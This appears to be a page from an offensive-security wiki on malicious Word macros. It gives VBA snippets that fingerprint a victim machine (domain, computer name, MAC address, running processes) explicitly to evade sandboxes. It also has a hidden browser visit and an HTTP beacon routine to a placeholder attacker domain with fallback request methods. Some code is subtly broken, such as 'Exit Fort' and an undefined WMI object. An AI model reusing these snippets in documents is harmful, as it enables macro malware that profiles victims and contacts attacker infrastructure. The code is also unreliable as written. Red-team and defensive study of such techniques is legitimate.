Info Extraction

This is how we will extract information with Macros. These can be used to evade sandboxes, or to just gather information about the user.

Extracting domain and computer name:

Set wshNetwork = CreateObject("Wscript.Network")
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.computername

Extracting MAC and IP

set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPENabled = True")
For Each oItem In cItems
	If Not IsNull(oItem.IPAddress) Then myMacAddress = oItem.macAddress
	Exit Fort
Next

set objProcessSet = objWMIService.ExecQuery("Select Name, ProcessID FROM Win32_Process")
For Each Process In objProcessSet
	ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"
Next

Visit Url

Here are some more VBA tricks, the one below visits a URL in the background

Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
    .Visible = False
    .Navigate "https://www.silentbreaksecurity.com"
    Do While .ReadyState <> 4: DoEvents: Loop
    .Quit
End With

This unhides all text

Selection.WholeStory
With Selection.Font
.Hidden = False
End With

Get a process list

Dim Service, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")

Set List = Service.ExecQuery ("SELECT * FROM Win32_Process")
Dim result As String
Dim Process As Object
For Each Process In List
    If Len(Process.ExecutablePath) > 0 Then
        result = result & Process.ExecutablePath & vbNewLine
    ElseIf Len(Process.name) > 0 Then
        result = result & Process.name & vbNewLine
    End If
Next

HTTP Request

Sub WebRequest()
Url = http://<yourdomain>/
On Error GoTo Request2
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
' very short timeouts, increase if you want. this is in miliseconds
objHTTP.setTimeouts 100, 100, 100, 100
'Get for example, can also be any other HTTP VERB, in case you POST, the Send method needs another argument (else you'll just post empty)

objHTTP.Open "GET", Url, False
objHTTP.Send
Set objHTTP = Nothing
Exit Sub
Request2:
'if you want you can create more error handlers, alternating url or serverxml/winhttp In case you want multiple errors you'll have to reset the error handle to -1
    On Error GoTo -1
' In case of multiple error handlers
    'On Error GoTo Request3
    'you can change your URL here if you want
    Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    winHttpReq.Open "GET", Url, False
    winHttpReq.Send        
End Sub

PreviousShellcode Execution NextDechaining Macros

Last updated 4 years ago

hashtagExtracting domain and computer name:

hashtagExtracting MAC and IP

hashtagVisit Url

hashtagThis unhides all text

hashtagGet a process list

hashtagHTTP Request